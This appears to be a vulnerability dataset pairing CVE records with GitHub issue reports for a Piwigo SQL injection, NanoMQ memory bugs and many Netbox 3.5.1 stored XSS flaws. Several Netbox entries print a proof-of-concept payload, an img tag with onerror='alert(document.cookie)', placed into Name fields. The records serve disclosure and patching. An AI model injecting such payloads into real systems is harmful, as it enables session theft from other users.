[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "B279DE47-F1F5-4BB9-A47B-1C9B73DD9076", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "89" ]
89
https://github.com/Piwigo/Piwigo/issues/1911
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "Piwigo", "Piwigo" ]
Accessing the 'profile' page ![image](https://user-images.githubusercontent.com/27283436/236197441-196a43d0-f0ba-43ac-9448-f029bec196c7.png) Add the 'user_id' parameter with single quotes ![image](https://user-images.githubusercontent.com/27283436/236197644-ae97d84c-4296-4721-aa16-b21665c9500e.png) Discovering ...
There is a SQL Injection in the "profile" function of piwigo
https://api.github.com/repos/Piwigo/Piwigo/issues/1911/comments
0
2023-05-04T12:22:34Z
2023-05-05T08:25:03Z
https://github.com/Piwigo/Piwigo/issues/1911
1,695,904,246
1,911
CVE-2023-33785
2023-05-24T20:15:10.210
A stored cross-site scripting (XSS) vulnerability in the Create Rack Roles (/dcim/rack-roles/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/n...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/8
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Rack Roles" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/dcim/rack-roles/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`...
Stored Cross Site Scripting Vulnerability in "Create Rack Roles" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/8/comments
0
2023-05-18T16:20:48Z
2023-05-18T16:20:48Z
https://github.com/anhdq201/netbox/issues/8
1,715,908,948
8
CVE-2023-33786
2023-05-24T20:15:10.263
A stored cross-site scripting (XSS) vulnerability in the Create Circuit Types (/circuits/circuit-types/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/n...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/2
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Circuit Types" function in the "Circuits" feature. # Proof of Concept **Step 1:** Go to `/circuits/circuit-types/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cooki...
Stored Cross Site Scripting Vulnerability in "Create Circuit Types" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/2/comments
0
2023-05-18T15:09:47Z
2023-05-18T15:25:56Z
https://github.com/anhdq201/netbox/issues/2
1,715,807,069
2
CVE-2023-33787
2023-05-24T20:15:10.317
A stored cross-site scripting (XSS) vulnerability in the Create Tenant Groups (/tenancy/tenant-groups/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/n...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/6
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Tenant Groups" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/tenancy/tenant-groups/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.co...
Stored Cross Site Scripting Vulnerability in "Create Tenant Groups" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/6/comments
0
2023-05-18T16:08:05Z
2023-05-18T16:08:05Z
https://github.com/anhdq201/netbox/issues/6
1,715,892,519
6
CVE-2023-33788
2023-05-24T20:15:10.373
A stored cross-site scripting (XSS) vulnerability in the Create Providers (/circuits/providers/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/n...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/3
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Providers" function in the "Circuits" feature. # Proof of Concept **Step 1:** Go to `/circuits/providers/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" ...
Stored Cross Site Scripting Vulnerability in "Create Providers" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/3/comments
0
2023-05-18T15:18:30Z
2023-05-18T15:25:34Z
https://github.com/anhdq201/netbox/issues/3
1,715,819,719
3
CVE-2023-33789
2023-05-24T20:15:10.430
A stored cross-site scripting (XSS) vulnerability in the Create Contact Groups (/tenancy/contact-groups/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/n...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/7
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Contact Groups" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/tenancy/contact-groups/`, click "Add" and insert payload "`<img src=1 onerror='alert(document....
Stored Cross Site Scripting Vulnerability in "Create Contact Groups" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/7/comments
0
2023-05-18T16:12:20Z
2023-05-18T16:12:20Z
https://github.com/anhdq201/netbox/issues/7
1,715,897,991
7
CVE-2023-33790
2023-05-24T20:15:10.487
A stored cross-site scripting (XSS) vulnerability in the Create Locations (/dcim/locations/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/n...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/9
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Locations" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/dcim/locations/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" ...
Stored Cross Site Scripting Vulnerability in "Create Locations" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/9/comments
0
2023-05-18T16:26:30Z
2023-05-18T16:30:19Z
https://github.com/anhdq201/netbox/issues/9
1,715,915,970
9
CVE-2023-33791
2023-05-24T20:15:10.543
A stored cross-site scripting (XSS) vulnerability in the Create Provider Accounts (/circuits/provider-accounts/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/n...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/4
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Provider Accounts" function in the "Circuits" feature. # Proof of Concept **Step 1:** Go to `/circuits/provider-accounts/`, click "Add" and insert payload "`<img src=1 onerror='alert(docume...
Stored Cross Site Scripting Vulnerability in "Create Provider Accounts" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/4/comments
0
2023-05-18T15:25:19Z
2023-05-18T15:25:19Z
https://github.com/anhdq201/netbox/issues/4
1,715,829,577
4
CVE-2023-33792
2023-05-24T20:15:10.607
A stored cross-site scripting (XSS) vulnerability in the Create Site Groups (/dcim/site-groups/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/10
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Site Groups" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/dcim/site-groups/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/...
Stored Cross Site Scripting Vulnerability in "Create Site Groups" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/10/comments
0
2023-05-18T16:29:59Z
2023-05-18T16:29:59Z
https://github.com/anhdq201/netbox/issues/10
1,715,921,814
10
CVE-2023-33793
2023-05-24T20:15:10.663
A stored cross-site scripting (XSS) vulnerability in the Create Power Panels (/dcim/power-panels/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/n...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Power Panels" function in the "Power" feature. # Proof of Concept **Step 1:** Go to `/dcim/power-panels/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" i...
Stored Cross Site Scripting Vulnerability in "Create Power Panels" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/1/comments
0
2023-05-18T15:04:10Z
2023-05-18T15:26:12Z
https://github.com/anhdq201/netbox/issues/1
1,715,798,041
1
CVE-2023-33794
2023-05-24T20:15:10.717
A stored cross-site scripting (XSS) vulnerability in the Create Tenants (/tenancy/tenants/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/n...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/5
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Tenants" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/tenancy/tenants/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" i...
Stored Cross Site Scripting Vulnerability in "Create Tenants" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/5/comments
0
2023-05-18T16:03:50Z
2023-05-18T16:03:50Z
https://github.com/anhdq201/netbox/issues/5
1,715,886,167
5
CVE-2023-33795
2023-05-24T20:15:10.773
A stored cross-site scripting (XSS) vulnerability in the Create Contact Roles (/tenancy/contact-roles/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/15
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Contacts" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/tenancy/contact-roles/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)...
Stored Cross Site Scripting Vulnerability in "Create Contact Roles" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/15/comments
0
2023-05-18T16:44:45Z
2023-05-18T16:44:45Z
https://github.com/anhdq201/netbox/issues/15
1,715,942,924
15
CVE-2023-33797
2023-05-24T20:15:10.893
A stored cross-site scripting (XSS) vulnerability in the Create Sites (/dcim/sites/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/12
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Sites" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/dcim/sites/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name...
Stored Cross Site Scripting Vulnerability in "Create Sites" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/12/comments
0
2023-05-18T16:34:34Z
2023-05-18T16:34:34Z
https://github.com/anhdq201/netbox/issues/12
1,715,930,151
12
CVE-2023-33798
2023-05-24T20:15:10.947
A stored cross-site scripting (XSS) vulnerability in the Create Rack (/dcim/rack/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/13
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Rack" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/dcim/rack/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "Name" ...
Stored Cross Site Scripting Vulnerability in "Create Rack" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/13/comments
0
2023-05-18T16:37:16Z
2023-05-18T16:37:16Z
https://github.com/anhdq201/netbox/issues/13
1,715,934,227
13
CVE-2023-33799
2023-05-24T20:15:11.003
A stored cross-site scripting (XSS) vulnerability in the Create Contacts (/tenancy/contacts/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/14
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Contacts" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/tenancy/contacts/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`"...
Stored Cross Site Scripting Vulnerability in "Create Contacts" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/14/comments
0
2023-05-18T16:42:36Z
2023-05-18T16:42:36Z
https://github.com/anhdq201/netbox/issues/14
1,715,940,484
14
CVE-2023-33800
2023-05-24T20:15:11.060
A stored cross-site scripting (XSS) vulnerability in the Create Regions (/dcim/regions/) function of Netbox v3.5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/netbox/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/anhdq201/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netbox:netbox:3.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "D28A2958-C184-45BD-BF89-DFBB81B7EF8A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludin...
[ "79" ]
79
https://github.com/anhdq201/netbox/issues/11
[ "Exploit", "Issue Tracking" ]
github.com
[ "anhdq201", "netbox" ]
# Version: 3.5.1 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Create Regions" function in the "Organization" feature. # Proof of Concept **Step 1:** Go to `/dcim/regions/`, click "Add" and insert payload "`<img src=1 onerror='alert(document.cookie)'/>`" in "...
Stored Cross Site Scripting Vulnerability in "Create Regions" function in Netbox 3.5.1
https://api.github.com/repos/anhdq201/netbox/issues/11/comments
0
2023-05-18T16:32:07Z
2023-05-18T16:32:07Z
https://github.com/anhdq201/netbox/issues/11
1,715,925,619
11
CVE-2023-33656
2023-05-30T18:15:10.383
A memory leak vulnerability exists in NanoMQ 0.17.2. The vulnerability is located in the file message.c. An attacker could exploit this vulnerability to cause a denial of service attack by causing the program to consume all available memory resources.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/emqx/nanomq" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List" ], "url": "https://github.com/emqx/nanomq/issues/1164" }, { "source": "cve@mitre.org", "ta...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*", "matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "770" ]
770
https://github.com/emqx/nanomq/issues/1164
[ "Exploit", "Mailing List" ]
github.com
[ "emqx", "nanomq" ]
**Describe the bug** 您好,我们在NanoMQ当前版本中还发现了一项内存泄露,以下为详细漏洞信息以供开发人员参考。 School of Cyber Science and Technology, Shandong University **Expected behavior** 如果在编译时启用 ASAN,NanoMQ 会崩溃并显示 ASAN 信息。 ![image](https://user-images.githubusercontent.com/44093631/232076656-b9f891f5-6a0f-4018-ab19-a35cec93e74d.png) **To Re...
potential memleak
https://api.github.com/repos/nanomq/nanomq/issues/1164/comments
2
2023-04-14T14:46:47Z
2023-04-15T07:50:40Z
https://github.com/nanomq/nanomq/issues/1164
1,668,392,801
1,164
CVE-2023-33656
2023-05-30T18:15:10.383
A memory leak vulnerability exists in NanoMQ 0.17.2. The vulnerability is located in the file message.c. An attacker could exploit this vulnerability to cause a denial of service attack by causing the program to consume all available memory resources.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/emqx/nanomq" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List" ], "url": "https://github.com/emqx/nanomq/issues/1164" }, { "source": "cve@mitre.org", "ta...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emqx:nanomq:0.17.2:*:*:*:*:*:*:*", "matchCriteriaId": "0898CABA-5930-437A-8300-4D91648091F1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "770" ]
770
https://github.com/emqx/nanomq/issues/1165#issuecomment-1515667127
[ "Exploit", "Vendor Advisory" ]
github.com
[ "emqx", "nanomq" ]
**Describe the bug** Our team (School of Cyber Science and Technology, Shandong University)have found the a potential issue in the current version of nanomq,it may cause heap-use-after-free when it handles the publish messages **Expected behavior** We use ASAN to compile the target server, and when we send a larg...
[Security]: wrong protocol name & data racing
https://api.github.com/repos/nanomq/nanomq/issues/1165/comments
13
2023-04-14T17:23:19Z
2023-04-25T10:06:34Z
